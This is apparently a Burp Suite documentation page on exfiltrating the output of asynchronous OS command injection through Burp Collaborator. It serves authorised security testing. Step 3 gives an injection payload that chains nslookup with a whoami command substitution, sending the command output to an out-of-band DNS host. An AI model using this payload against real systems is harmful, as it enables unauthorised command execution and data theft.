Professional

Exploiting OS command injection vulnerabilities to exfiltrate data with Burp Suite

  • Last updated: October 29, 2024

  • Read time: 1 Minute

Once you have identified a request that is vulnerable to asynchronous OS command injection, you can attempt to exfiltrate the output from injected commands through the out-of-band channel between the website and Burp Collaborator.

Before you start

Identify a request that is vulnerable to asynchronous OS command injection. For more information, see Testing for asynchronous OS command injection vulnerabilities with Burp Suite.

Steps

You can use Burp Repeater to attempt to exfiltrate data from a request:

  1. In Proxy > HTTP history, right-click the request that is vulnerable to asynchronous OS command injection. Select Send to Repeater.
  2. Go to the Repeater tab.
  3. Change a parameter's value to a proof-of-concept payload. The payload should include:

    • The nslookup command to cause DNS lookup for a Collaborator subdomain. To insert a Collaborator subdomain into the payload, right-click and select Insert Collaborator payload.
    • A command that obtains information, such as the whoami command.

    For example, & nslookup `whoami`.burp-collaborator-subdomain & may cause a DNS lookup to the Burp Collaborator subdomain. This lookup will contain the result of the whoami command.

  4. Click Send.
  5. Go to the Collaborator tab and click Poll now. Any interactions with the Collaborator server are listed in the table.
  6. Review the details of any interactions to identify any exfiltrated data.

Note

The command may be executed after a delay. The Collaborator tab flashes when an interaction occurs. Make sure that you continue to check the Collaborator tab to identify any delayed interactions.

Was this article helpful?